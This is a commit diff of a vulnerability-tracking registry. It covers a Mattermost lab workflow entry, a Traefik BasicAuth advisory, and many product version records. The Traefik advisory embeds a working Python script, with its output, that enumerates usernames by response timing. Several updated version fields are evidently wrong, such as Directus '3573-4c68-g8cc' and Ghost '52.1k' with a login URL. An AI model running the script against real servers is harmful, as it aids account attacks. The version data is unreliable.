"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-4265--workflow",
"vuln_family": "xss",
"entry_surface": "web-ui-render-path",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `package`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035, introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "editor-or-admin",
"required_role": "unknown",
"affected_version_assertion": [
"11.3.x <= 11.3.0",
"11.2.x <= 11.2.2",
"10.11.x <= 10.11.10"
"introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035",
"introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `xss` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/admin/editor",
"/preview",
"/rendered-content"
"/repo"
],
"input_shape": "\u53d7\u63a7 HTML/Markdown/\u5bcc\u6587\u672c\u8f93\u5165\uff0c\u89c2\u5bdf\u6e32\u67d3\u4e0a\u4e0b\u6587\u662f\u5426\u5931\u53bb\u7f16\u7801\u6216\u51c0\u5316\u3002",
"expected_unsafe_behavior": "\u8f93\u5165\u5728\u76ee\u6807\u4e0a\u4e0b\u6587\u6267\u884c\u6216\u88ab\u6d4f\u89c8\u5668\u89e3\u91ca\u4e3a\u4e3b\u52a8\u5185\u5bb9\u3002",
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
@@ -146,10 +188,10 @@
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `11.4.0`\u3002",
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260107144005-c7f6efdfb035, introduced=0, fixed<5.3.2-0.20260107144005-c7f6efdfb035, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260107144005-c7f6efdfb035`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `xss` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
@@ -175,14 +217,14 @@
"blocked_reason": null,
"metadata": {
"source_names": [
"Mattermost Security Updates JSON"
"OSV Mattermost"
],
"source_kinds": [
"json-feed"
"osv-batch"
],
"candidate_count": 1,
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "package",
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-4265--workflow"
}

22
08-threat-intel/registry/advisories/traefik--CVE-2026-32305.json
查看文件

文件差异因一行或多行过长而隐藏

22
08-threat-intel/registry/advisories/traefik--CVE-2026-32595.json
查看文件

@@ -7,7 +7,7 @@
"title": "Traefik Affected by BasicAuth Middleware Timing Attack Allows Username Enumeration",
"summary": "## Summary\n\nThere is a potential vulnerability in Traefik's BasicAuth middleware that allows username enumeration via a timing attack.\n\nWhen a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n<details>\n<summary>Original Description</summary>\n\n### Summary\nA timing attack vulnerability exists in Traefik's BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn't exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration.\n\n### Details\nThe vulnerability exists in the BasicAuth middleware implementation. When validating credentials:\n- User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt's design\n- User doesn't exist: The system immediately returns authentication failure in ~0.6ms\n\nThis timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames.\n\nRoot Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution.\n\nExpected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times.\n\n### PoC\nEnvironment:\n- Traefik v3.6.9\n- k3s v1.34.5\n\nConfiguration:\n```yaml\napiVersion: traefik.io/v1alpha1\nkind: Middleware\nmetadata:\n name: basicauth\n namespace: traefik-poc\nspec:\n basicAuth:\n secret: basic-auth-secret\n---\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: test-basicauth\n annotations:\n traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd\nspec:\n ingressClassName: traefik\n rules:\n - http:\n paths:\n - path: /protected\n pathType: Prefix\n backend:\n service:\n name: whoami\n port:\n number: 80\n```\n\nPoC Script:\n```python\n#!/usr/bin/env python3\nimport requests\nimport time\nimport statistics\nimport sys\nTARGET = sys.argv[1] if len(sys.argv) > 1 else \"http://localhost:30080/protected\"\nTEST_USERS = [\"admin\", \"root\", \"test\", \"nonexistent12345\"]\nSAMPLES = 20\ndef measure_time(username, password=\"wrongpassword\"):\n times = []\n for _ in range(SAMPLES):\n start = time.perf_counter()\n requests.get(TARGET, auth=(username, password), timeout=5)\n elapsed = time.perf_counter() - start\n times.append(elapsed)\n return statistics.median(times)\nprint(f\"Target: {TARGET}\")\nprint(f\"Samples per user: {SAMPLES}\\n\")\nfor user in TEST_USERS:\n median = measure_time(user)\n if median > 0.05: # bcrypt threshold\n status = \"[+] EXISTS (slow - bcrypt verification)\"\n else:\n status = \"[-] NOT FOUND (fast - immediate return)\"\n print(f\"{status}: {user:20s} | median={median:.4f}s\")\n```\n\nExecution Results:\n```\nTarget: http://10.10.10.7:30080/protected\nSamples per user: 20\n\n[+] EXISTS (slow - bcrypt verification): admin | median=0.1665s\n[-] NOT FOUND (fast - immediate return): root | median=0.0006s\n[-] NOT FOUND (fast - immediate return): test | median=0.0006s\n[-] NOT FOUND (fast - immediate return): nonexistent | median=0.0006s\n\nTiming difference ratio: 298.0x\n```\n\n### Impact\n- **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208)\n- **Impact:**\n - Attackers can enumerate valid usernames without authentication\n - Enables targeted password brute-force attacks against confirmed accounts\n - Exposes information about system user structure\n- **Who is impacted:** All users of Traefik's BasicAuth middleware are affected. The vulnerability requires:\n - BasicAuth middleware enabled\n - Attacker able to make requests to protected endpoints\n - Network access to measure response times\n- **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times\n- **Privileges Required:** None\n- **User Interaction:** None\n\n</details>\n\n---",
"published_at": "2026-03-20T15:43:13Z",
"updated_at": "2026-03-20T15:46:26.940872Z",
"updated_at": "2026-03-23T18:56:05.020639Z",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
@@ -22,6 +22,7 @@
],
"aliases": [
"CVE-2026-32595",
"GO-2026-4792",
"GHSA-g3hg-j4jv-cwfr"
],
"cve_ids": [
@@ -31,13 +32,15 @@
"GHSA-g3hg-j4jv-cwfr"
],
"osv_ids": [
"GHSA-g3hg-j4jv-cwfr"
"GHSA-g3hg-j4jv-cwfr",
"GO-2026-4792"
],
"affected_versions": [
"introduced=0, last_affected=1.7.34",
"introduced=0, fixed<2.11.41",
"introduced=0, fixed<3.6.11",
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2"
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2",
"introduced=0"
],
"fixed_versions": [
"2.11.41",
@@ -83,14 +86,15 @@
"introduced=0, last_affected=1.7.34",
"introduced=0, fixed<2.11.41",
"introduced=0, fixed<3.6.11",
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2"
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2",
"introduced=0"
],
"fixed_version_ranges": [
"2.11.41",
"3.6.11",
"3.7.0-ea.2"
],
"introduced_version": "introduced=3.7.0-ea.1, fixed<3.7.0-ea.2",
"introduced_version": "introduced=0",
"patched_version": "2.11.41",
"version_evidence_sources": [
"https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr",
@@ -104,7 +108,8 @@
"traefik--repo--github-com-traefik-traefik-v3--introduced-0-last-affected-1-7-34",
"traefik--repo--github-com-traefik-traefik-v3--introduced-0-fixed-2-11-41",
"traefik--repo--github-com-traefik-traefik-v3--introduced-0-fixed-3-6-11",
"traefik--repo--github-com-traefik-traefik-v3--introduced-3-7-0-ea-1-fixed-3-7-0-ea-2"
"traefik--repo--github-com-traefik-traefik-v3--introduced-3-7-0-ea-1-fixed-3-7-0-ea-2",
"traefik--repo--github-com-traefik-traefik-v3--introduced-0"
],
"fixed_version_refs": [
"traefik--repo--github-com-traefik-traefik-v3--2-11-41",
@@ -133,7 +138,8 @@
"introduced=0, last_affected=1.7.34",
"introduced=0, fixed<2.11.41",
"introduced=0, fixed<3.6.11",
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2"
"introduced=3.7.0-ea.1, fixed<3.7.0-ea.2",
"introduced=0"
],
"trigger_vector": "\u5bf9 `proxy-boundary` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
@@ -195,7 +201,7 @@
"source_kinds": [
"osv-batch"
],
"candidate_count": 1,
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",

2
08-threat-intel/registry/entities/adminer.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/adobe-commerce.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/angular--package--angular-core.json
查看文件

@@ -23,7 +23,7 @@
],
"version_sync_status": "green",
"security_version_count": 18,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/angular/angular/security/advisories/GHSA-prjf-86w9-mfqv",

2
08-threat-intel/registry/entities/angular.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 18,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/apache-httpd.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 1,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"Apache HTTPD Security"
],

2
08-threat-intel/registry/entities/apache-tomcat.json
查看文件

@@ -23,7 +23,7 @@
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"Apache Tomcat Security"
],

2
08-threat-intel/registry/entities/aspnet-core.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/astro--module--astro.json
查看文件

@@ -23,7 +23,7 @@
],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/withastro/astro/security/advisories/GHSA-wrwg-2hg8-v723",

2
08-threat-intel/registry/entities/astro--project--astro.json
查看文件

@@ -31,7 +31,7 @@
],
"version_sync_status": "green",
"security_version_count": 26,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/withastro/astro/security/advisories/GHSA-c4pw-33h3-35xw",

2
08-threat-intel/registry/entities/astro.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 30,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

11
08-threat-intel/registry/entities/caddy--extension--github-com-caddyserver-caddy-v2.json
查看文件

@@ -12,20 +12,21 @@
"repo_url": "https://github.com/caddyserver/caddy",
"package_registry": "",
"marketplace_url": "",
"latest_version": "2.11.2",
"latest_version": "2.11.1",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_release_url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"latest_release_at": "2026-02-27T19:55:10Z",
"latest_release_url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g",
"version_source_refs": [
"https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g"
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:55+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g"
"https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g",
"advisory-fixed-version"
],
"catalog_source": "",
"catalog_reason": "",

9
08-threat-intel/registry/entities/caddy--repo--github-com-caddyserver-caddy-v2.json
查看文件

@@ -14,8 +14,8 @@
"marketplace_url": "",
"latest_version": "2.11.2",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_release_url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"latest_release_at": "2026-03-23T04:52:47.652974Z",
"latest_release_url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-7r4p-vjf4-gxv4",
"version_source_refs": [
"https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-4xrr-hq4w-6vf4",
@@ -24,12 +24,13 @@
],
"version_sync_status": "green",
"security_version_count": 5,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:56+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-4xrr-hq4w-6vf4",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-m2w3-8f23-hxxf",
"https://github.com/caddyserver/caddy/security/advisories/GHSA-7r4p-vjf4-gxv4"
"https://github.com/caddyserver/caddy/security/advisories/GHSA-7r4p-vjf4-gxv4",
"advisory-fixed-version"
],
"catalog_source": "",
"catalog_reason": "",

8
08-threat-intel/registry/entities/caddy.json
查看文件

@@ -12,14 +12,14 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "2.11.2",
"latest_version": "2.11.1",
"version_scheme": "vendor",
"latest_release_at": "2026-03-06T02:43:43Z",
"latest_release_url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.2",
"latest_release_at": "2026-02-27T19:55:10Z",
"latest_release_url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-5r3v-vc8m-m96g",
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 7,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:54+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

6
08-threat-intel/registry/entities/directus--repo--directus-directus.json
查看文件

@@ -12,17 +12,17 @@
"repo_url": "https://github.com/directus/directus",
"package_registry": "",
"marketplace_url": "",
"latest_version": "11.16.1",
"latest_version": "3573-4c68-g8cc",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-10T22:20:52Z",
"latest_release_url": "https://github.com/directus/directus/releases/tag/v11.16.1",
"latest_release_url": "https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc",
"version_source_refs": [
"https://github.com/directus/directus/releases/tag/v11.16.1",
"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc"
],
"version_sync_status": "green",
"security_version_count": 1,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"Directus GitHub Advisories"

6
08-threat-intel/registry/entities/directus.json
查看文件

@@ -12,16 +12,16 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "11.16.1",
"latest_version": "3573-4c68-g8cc",
"version_scheme": "vendor",
"latest_release_at": "2026-03-10T22:20:52Z",
"latest_release_url": "https://github.com/directus/directus/releases/tag/v11.16.1",
"latest_release_url": "https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc",
"version_source_refs": [
"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc"
],
"version_sync_status": "green",
"security_version_count": 1,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:56+00:00",
"latest_version_evidence": [
"Directus GitHub Advisories"
],

2
08-threat-intel/registry/entities/discourse.json
查看文件

@@ -31,7 +31,7 @@
],
"version_sync_status": "green",
"security_version_count": 78,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"Discourse Release Notes RSS",
"Discourse Security RSS"

2
08-threat-intel/registry/entities/django--project--django.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 160,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"npm latest",
"https://nvd.nist.gov/vuln/detail/CVE-2019-11358"

2
08-threat-intel/registry/entities/django.json
查看文件

@@ -38,7 +38,7 @@
],
"version_sync_status": "green",
"security_version_count": 160,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"Django Security Weblog",
"Django Security Releases Archive"

2
08-threat-intel/registry/entities/drupal.json
查看文件

@@ -27,7 +27,7 @@
],
"version_sync_status": "green",
"security_version_count": 74,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"Drupal Security Advisories RSS"
],

11
08-threat-intel/registry/entities/echo--repo--github-com-labstack-echo-v4.json
查看文件

@@ -12,10 +12,10 @@
"repo_url": "https://github.com/labstack/echo",
"package_registry": "",
"marketplace_url": "",
"latest_version": "5.0.4",
"latest_version": "4.9.0",
"version_scheme": "semver-ish",
"latest_release_at": "2026-02-15T15:55:53Z",
"latest_release_url": "https://github.com/labstack/echo/releases/tag/v5.0.4",
"latest_release_at": "2024-05-20T16:03:47Z",
"latest_release_url": "https://github.com/labstack/echo/issues/2259",
"version_source_refs": [
"https://github.com/labstack/echo/releases/tag/v5.0.4",
"https://github.com/labstack/echo/pull/1718",
@@ -23,11 +23,12 @@
],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"https://github.com/labstack/echo/pull/1718",
"https://github.com/labstack/echo/issues/2259"
"https://github.com/labstack/echo/issues/2259",
"advisory-fixed-version"
],
"catalog_source": "",
"catalog_reason": "",

8
08-threat-intel/registry/entities/echo.json
查看文件

@@ -12,14 +12,14 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "5.0.4",
"latest_version": "4.9.0",
"version_scheme": "vendor",
"latest_release_at": "2026-02-15T15:55:53Z",
"latest_release_url": "https://github.com/labstack/echo/releases/tag/v5.0.4",
"latest_release_at": "2024-05-20T16:03:47Z",
"latest_release_url": "https://github.com/labstack/echo/issues/2259",
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/esbuild--project--esbuild.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99"

2
08-threat-intel/registry/entities/esbuild.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/express.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

4
08-threat-intel/registry/entities/fastify--project--fastify.json
查看文件

@@ -12,7 +12,7 @@
"repo_url": "",
"package_registry": "https://www.npmjs.com/package/fastify",
"marketplace_url": "",
"latest_version": "5.8.2",
"latest_version": "5.8.4",
"version_scheme": "semver-ish",
"latest_release_at": "",
"latest_release_url": "https://www.npmjs.com/package/fastify",
@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/fastify/fastify/security/advisories/GHSA-573f-x89g-hqp9"

4
08-threat-intel/registry/entities/fastify.json
查看文件

@@ -12,14 +12,14 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "5.8.2",
"latest_version": "5.8.4",
"version_scheme": "vendor",
"latest_release_at": "",
"latest_release_url": "https://www.npmjs.com/package/fastify",
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/flask--project--flask.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 22,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/pallets/flask/security/advisories/GHSA-68rp-wp8r-4726"

2
08-threat-intel/registry/entities/flask.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 22,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

12
08-threat-intel/registry/entities/ghost--repo--tryghost-ghost.json
查看文件

@@ -12,18 +12,20 @@
"repo_url": "https://github.com/TryGhost/Ghost",
"package_registry": "",
"marketplace_url": "",
"latest_version": "6.22.1",
"latest_version": "52.1k",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-20T15:25:05Z",
"latest_release_url": "https://github.com/TryGhost/Ghost/releases/tag/v6.22.1",
"latest_release_url": "https://github.com/login?return_to=%2FTryGhost%2FGhost",
"version_source_refs": [
"https://github.com/TryGhost/Ghost/releases/tag/v6.22.1"
"https://github.com/TryGhost/Ghost/releases/tag/v6.22.1",
"https://github.com/login?return_to=%2FTryGhost%2FGhost"
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:58+00:00",
"latest_version_evidence": [
"GitHub Releases API"
"GitHub Releases API",
"Ghost GitHub Advisories"
],
"catalog_source": "Ghost GitHub Advisories",
"catalog_reason": "source catalog exposed a stable security-related object and auto-catalog is enabled",

6
08-threat-intel/registry/entities/ghost.json
查看文件

@@ -12,16 +12,16 @@
"repo_url": "",
"package_registry": "",
